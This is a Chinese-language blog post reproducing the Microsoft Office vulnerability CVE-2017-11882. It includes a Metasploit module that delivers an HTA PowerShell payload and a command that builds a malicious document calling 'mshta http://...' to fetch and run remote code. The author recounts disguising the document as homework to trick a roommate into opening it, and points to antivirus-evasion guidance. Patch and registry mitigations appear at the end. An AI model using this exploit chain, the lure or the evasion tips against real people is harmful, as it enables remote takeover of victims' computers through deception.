CVE-2017-11882复现 ## 0x00 前言 ## > office全版本最新的代码执行漏洞,无视宏,无弹窗。漏洞一出来的时候就想去复现,今天运气不错刚好有点时间于是就腾出了 > 点时间来复现这个洞。纯复现文档,大佬勿喷 ## 0x01 复现过程 ## > 在复现的时候遇到了各种蛋疼的问题,一开始是使用自己的物理机(Win10+office2016)复现的,但是就是不成功计算器怎样都 > 弹不出来。各种怀疑人生,然后最后使用了室友(Win10+offic2010)的笔记本复现成功。 > > 我们这里使用的是Ridter师傅改进了的脚本:[https://github.com/Ridter/CVE-2017-11882/][1] > CVE-2017-11882.rb ``` ## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer def initialize(info = {}) super(update_info(info, 'Name' => 'Microsoft Office Payload Delivery', 'Description' => %q{ This module generates an command to place within a word document, that when executed, will retrieve a HTA payload via HTTP from an web server. Currently have not figured out how to generate a doc. }, 'License' => MSF_LICENSE, 'Arch' => ARCH_X86, 'Platform' => 'win', 'Targets' => [ ['Automatic', {} ], ], 'DefaultTarget' => 0, )) end def on_request_uri(cli, _request) print_status("Delivering payload") p = regenerate_payload(cli) data = Msf::Util::EXE.to_executable_fmt( framework, ARCH_X86, 'win', p.encoded, 'hta-psh', { :arch => ARCH_X86, :platform => 'win '} ) send_response(cli, data, 'Content-Type' => 'application/hta') end def primer url = get_uri print_status("Place the following DDE in an MS document:") print_line("mshta.exe \"#{url}\"") end end ``` 这里顺带贴出msf官方最新的rb:[https://raw.githubusercontent.com/realoriginal/metasploit-framework/39a4d193a17c6f85846a58a429c0914f542bded2/modules/exploits/windows/fileformat/office_ms17_11882.rb][2] 我们先打开msf使用上面的模块进行配置生成mshta ![222.PNG][3] 然后复制得到的mshta地址复制到Ridter师傅改进了的脚本里生成doc文件 ``` python Command_CVE-2017-11882.py -c "mshta http://192.168.1.8:8080/sJ0u6yRR" -o test.doc ``` ![11.PNG][4] 将刚刚那个文档伪装成正常的作业发给自己的室友诱骗其打开 ![微信图片_20171122210023.png][5] 这时候我们msf那边便上线了 ![1.PNG][6] ![2.PNG][7] ![捕获.PNG][8] ## 0x02 免杀 ## > 因为mshta被利用太多了,很容易被杀。今天测试的时候直接被360报毒。 > 大家可以参考倾旋的这篇文章来进行免杀:[http://payloads.online/archivers/2017-11-08/1][9] ## 0x03 漏洞修复 ## 1. 下载微软对此漏洞补丁:https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11882,并且开启自动更新功能 2. 在注册表中禁用该漏洞模块 ``` reg add "HKLM\SOFTWARE\Microsoft\Office\XX.X\Common\COM Compatibility\{0002CE02-0000-0000-C000-000000000046}" /v "Compatibility Flags" /t REG_DWORD /d 0x400 reg add "HKLM\SOFTWARE\Wow6432Node\Microsoft\Office\XX.X\Common\COM Compatibility\{0002CE02-0000-0000-C000-000000000046}" /v "Compatibility Flags" /t REG_DWORD/d 0x400 ``` [1]: https://github.com/Ridter/CVE-2017-11882/ [2]: https://raw.githubusercontent.com/realoriginal/metasploit-framework/39a4d193a17c6f85846a58a429c0914f542bded2/modules/exploits/windows/fileformat/office_ms17_11882.rb [3]: http://www.lovei.org/usr/uploads/2017/11/1895559743.png [4]: http://www.lovei.org/usr/uploads/2017/11/669709062.png [5]: http://www.lovei.org/usr/uploads/2017/11/3361604605.png [6]: http://www.lovei.org/usr/uploads/2017/11/3365975425.png [7]: http://www.lovei.org/usr/uploads/2017/11/3369984649.png [8]: http://www.lovei.org/usr/uploads/2017/11/4100346204.png [9]: http://payloads.online/archivers/2017-11-08/1